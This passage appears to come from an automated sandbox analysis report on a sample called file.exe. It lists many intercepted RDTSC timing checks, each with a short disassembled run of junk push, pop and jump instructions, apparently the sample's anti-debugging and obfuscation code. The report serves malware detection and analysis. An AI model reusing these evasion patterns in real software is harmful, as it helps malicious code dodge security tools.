              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A3A6 second address: 73A3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edx 0x00000008 jbe 00007F56AD341B16h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A4DB second address: 73A4E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A61B second address: 73A639 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56AD341B26h 0x00000008 jbe 00007F56AD341B16h 0x0000000e jmp 00007F56AD341B1Ah 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCEF second address: 73FCF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCF4 second address: 73FCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EA0F second address: 73EA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F56ACB76F36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73ECBF second address: 73ECC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EF72 second address: 73EF7C instructions: 0x00000000 rdtsc 0x00000002 je 00007F56ACB76F36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711475 second address: 711479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F9C1 second address: 73F9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F56ACB76F36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F9D0 second address: 73F9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F9D6 second address: 73F9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F9DA second address: 73F9DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F9DE second address: 73FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F56ACB76F47h 0x0000000f pushad 0x00000010 jmp 00007F56ACB76F3Dh 0x00000015 jmp 00007F56ACB76F45h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC348 second address: 6CC34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746629 second address: 74662F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74662F second address: 746633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716423 second address: 716440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716440 second address: 6F5C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F56AD341B16h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jp 00007F56AD341B27h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F56AD341B18h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov ecx, dword ptr [ebp+122D2A0Dh] 0x00000034 lea eax, dword ptr [ebp+12486166h] 0x0000003a call 00007F56AD341B1Ch 0x0000003f sub dword ptr [ebp+1245014Dh], eax 0x00000045 pop edi 0x00000046 movsx ecx, di 0x00000049 push eax 0x0000004a jmp 00007F56AD341B25h 0x0000004f mov dword ptr [esp], eax 0x00000052 mov dword ptr [ebp+1245067Ch], ebx 0x00000058 call dword ptr [ebp+122D2D4Ch] 0x0000005e push edi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716835 second address: 71684A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F56ACB76F38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71684A second address: 716850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716850 second address: 716854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716854 second address: 716858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716B6E second address: 716B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716B72 second address: 716B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F56AD341B1Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716B9F second address: 716BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717397 second address: 7173A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F56AD341B16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7176E7 second address: 7176F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F56ACB76F36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7176F1 second address: 7176F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F66CF second address: 6F66E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007F56ACB76F36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F56ACB76F36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F66E7 second address: 6F66EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F66EB second address: 6F671D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F44h 0x00000007 jmp 00007F56ACB76F47h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7457F6 second address: 7457FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745D21 second address: 745D2B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F56ACB76F36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7461BA second address: 7461C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C06E second address: 74C099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ch 0x00000007 jmp 00007F56ACB76F41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F56ACB76F36h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AA40 second address: 74AA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F56AD341B25h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AD41 second address: 74AD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B009 second address: 74B00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B00D second address: 74B013 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B013 second address: 74B04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a jmp 00007F56AD341B21h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F56AD341B26h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B04A second address: 74B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B1A9 second address: 74B1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B1AD second address: 74B1D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F56ACB76F46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B1D1 second address: 74B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B1D5 second address: 74B1D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B5D0 second address: 74B5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B5DB second address: 74B5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B761 second address: 74B770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jbe 00007F56AD341B16h 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B8CA second address: 74B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F45h 0x00000009 pop esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BA62 second address: 74BA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BEF8 second address: 74BF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F56ACB76F36h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A6C3 second address: 74A6E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B25h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A6E3 second address: 74A6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A6EC second address: 74A705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B25h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752FA7 second address: 752FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752FAD second address: 752FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752FB1 second address: 752FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752FB5 second address: 752FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752FBE second address: 752FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752FC6 second address: 752FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 755D55 second address: 755D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 755D59 second address: 755D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F56AD341B25h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757D9B second address: 757DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F56ACB76F3Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757F53 second address: 757F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F56AD341B1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757F60 second address: 757F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757F64 second address: 757F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DB62 second address: 75DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F56ACB76F3Dh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e jl 00007F56ACB76F3Eh 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DB82 second address: 75DBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F56AD341B1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F56AD341B16h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DBA1 second address: 75DBB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DBB3 second address: 75DBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DBB9 second address: 75DBDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F56ACB76F47h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DBDA second address: 75DBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B29h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DBF7 second address: 75DBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CE27 second address: 75CE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B1Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CE35 second address: 75CE3E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D152E second address: 6D153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F56AD341B2Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75CFA0 second address: 75CFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F56ACB76F36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D26A second address: 75D26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D26E second address: 75D282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D282 second address: 75D294 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B1Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D294 second address: 75D29E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F56ACB76F36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D29E second address: 75D2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F56AD341B1Fh 0x0000000f push eax 0x00000010 jnp 00007F56AD341B16h 0x00000016 jmp 00007F56AD341B1Ch 0x0000001b pop eax 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D421 second address: 75D442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56ACB76F49h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D442 second address: 75D44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D44A second address: 75D44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5B4 second address: 75D5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5BC second address: 75D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D70D second address: 75D717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F56AD341B16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662C8 second address: 7662CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662CE second address: 7662D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764ED6 second address: 764EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764EDA second address: 764EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764EDE second address: 764EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717113 second address: 71718E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F56AD341B1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F56AD341B18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+124861A5h] 0x0000002b mov dword ptr [ebp+124510C4h], esi 0x00000031 add eax, ebx 0x00000033 jmp 00007F56AD341B29h 0x00000038 pushad 0x00000039 movzx edi, cx 0x0000003c xor eax, dword ptr [ebp+122D38BBh] 0x00000042 popad 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F56AD341B22h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765424 second address: 765437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F56ACB76F36h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765437 second address: 76543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76543B second address: 76545A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Eh 0x00000007 jng 00007F56ACB76F36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76545A second address: 765479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
